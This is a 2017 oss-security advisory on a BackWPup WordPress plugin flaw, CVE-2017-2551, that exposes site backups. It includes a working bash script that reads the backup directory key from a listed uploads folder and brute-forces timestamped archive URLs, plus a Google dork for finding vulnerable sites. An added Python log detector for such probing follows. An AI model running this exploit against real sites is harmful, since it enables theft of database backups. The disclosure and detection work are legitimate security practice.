List: oss-security
Subject: [oss-security] Vulnerability in Wordpress Plugin backwpup v3.4.1 possible brute forcing of backup fi
From: "Larry W. Cashdollar" <larry0 () me ! com>
Date: 2017-09-27 16:13:47
Message-ID: A9D8E9DF-36AC-4F46-BAF1-0C6E002E0D71 () me ! com
Title: Vulnerability in Wordpress Plugin backwpup v3.4.1 possible brute forcing of backup file download
Author: Larry W. Cashdollar, @_larry0
Date: 2017-09-08
CVE-ID:[CVE-2017-2551]
Download Site: https://wordpress.org/plugins/backwpup
Vendor: Inpsyde
Vendor Notified: 2017-09-08, fixed v3.4.2
Vendor Contact: plugins@wordpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=201
Description: "The backup plugin BackWPup can be used to save your complete installation including /wp-content/ and push them to an external Backup Service, like Dropbox, S3, FTP and many more."
Vulnerability:
There is a weakness in the way backwpup creates and stores the backup files it generates. It creates a random string to obscure the location, but it uses that same string to create the storage directory under wp-content/uploads/, which in most installations of WordPress allows file listings.
Someone looking to steal a copy of the database could simply list the directories in /uploads to find that random string and then brute force the location of the file, as its structure is just a date and time stamp. It would take a maximum of 86400 tries to guess if a backup is available for that day. Filename format:
backwpup_ RANDOMSTRINGBACKUPNUMBER_%Y-%m-%d_%H-%i-%s
Default settings are:
%d = Two digit day of the month, with leading zeros
%m = Day of the month, with leading zeros
%Y = Four digit representation for the year
%H = Hour in 24-hour format, with leading zeros
%i = Two digit representation of the minute
%s = Two digit representation of the second
https://wordpress.org/plugins/backwpup
Exploit Code:
#!/bin/bash
#Exploit for Wordpress Plugin BackWPup v3.4.1
#Download https://wordpress.org/plugins/backwpup
#CWE-552: Files or Directories Accessible to External Parties
#CVE-ID: CVE-2017-2551
#Google Dork: inurl:wp-content/uploads/backwpup


#Add banner about vulnerability

KEY=`curl --silent http://$1/wp-content/uploads/|html2text |grep backups | awk -F- '{print $2}'`

#Add error checking here
echo "[+] Getting Unique Key $KEY"
DIR="backwpup-$KEY-backups"
echo "[+] Checking directory $DIR"
WPATH="$DIR/backwpup_$KEY"
echo "[+] Creating Path: $WPATH"
#use date command here for the default date of current day
MONTH=09
DAY=07
YEAR=2017
Z=0

echo "[+] Scanning website for available backups:"
for y in `seq -w 0 23`; do
  for x in `seq -w 0 59`; do
    Y=`echo "scale=2;($Z/86000)*100"|bc`;
    echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CWPATH $Y%"
    for z in `seq -w 0 59`; do
      Z=$(( $Z + 1 ));
      CWPATH="http://$1/wp-content/uploads/$WPATH"01"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip";
      RESULT=`curl -s --head $CWPATH|grep 200`;
      if [ -n "$RESULT" ]; then
        echo ""
        echo "[+] Location $CWPATH Found";
        echo "[+] Received $RESULT";
        echo "Downloading......";
        # wget $CWPATH
        exit;
      fi;
    done
  done
done
echo "Completed."
Screen Shots:
Notes: Google Dork: inurl:wp-content/uploads/backwpup=
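The timestamp brute force described in the advisory, seen from the defender's side, as an added example that is not part of the original post: a Python script that parses constructed web-server access-log lines and reports any client that cycles through timestamped BackWPup archive names under a listed wp-content/uploads/ directory, or that receives a 200 on such an archive. The log line format, the alphanumeric character class for the random key, the threshold and the sample key are assumptions.

```python
import re
from collections import defaultdict
# Archive path pattern from the advisory: the same random key names the
# uploads subdirectory and the file, followed by the job number and a
# %Y-%m-%d_%H-%i-%s timestamp. Alphanumeric key is an assumption.
BACKUP_RE = re.compile(
    r"/wp-content/uploads/backwpup-(?P<key>[A-Za-z0-9]+)-backups/"
    r"backwpup_(?P=key)\d+_\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}\.[A-Za-z0-9.]+$"
)
# Common/combined access-log line (assumed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
def analyze(log_lines, threshold=30):
    """Per-client view of requests against BackWPup archive paths.
    A client is reported when it exceeds `threshold` probes (the
    timestamp brute force) or receives any 200 on an archive."""
    stats = defaultdict(lambda: {"probes": 0, "downloads": [], "listed_uploads": False})
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path, status = m["ip"], m["path"], m["status"]
        if BACKUP_RE.match(path):
            stats[ip]["probes"] += 1
            if status == "200":
                stats[ip]["downloads"].append(path)
        elif path.rstrip("/") == "/wp-content/uploads" and status == "200":
            stats[ip]["listed_uploads"] = True  # directory index was served
    return {ip: s for ip, s in stats.items()
            if s["probes"] >= threshold or s["downloads"]}

def constructed_log():
    """Constructed sample: one client lists /uploads/, then probes 40
    timestamps with HEAD (404) and finally hits an archive; a second
    client makes one ordinary request."""
    key = "d3adb33f"  # constructed key, not a value from the advisory
    base = f"/wp-content/uploads/backwpup-{key}-backups/backwpup_{key}01_2017-09-07"
    ts = "[07/Sep/2017:10:00:00 +0000]"
    lines = [f'203.0.113.5 - - {ts} "GET /wp-content/uploads/ HTTP/1.1" 200 512']
    lines += [f'203.0.113.5 - - {ts} "HEAD {base}_03-15-{s:02d}.zip HTTP/1.1" 404 0'
              for s in range(40)]
    lines.append(f'203.0.113.5 - - {ts} "HEAD {base}_03-15-40.zip HTTP/1.1" 200 0')
    lines.append(f'198.51.100.9 - - {ts} "GET /wp-content/uploads/2017/09/logo.png HTTP/1.1" 200 1024')
    return lines

if __name__ == "__main__":
    for ip, s in analyze(constructed_log()).items():
        print(f"{ip}: {s['probes']} probes, listing={s['listed_uploads']}, downloads={s['downloads']}")
```

The same logic applies to real Apache or nginx access logs in combined format; a 200 on an archive path is the event to alert on regardless of probe count, while the probe count alone catches an attempt that has not yet succeeded.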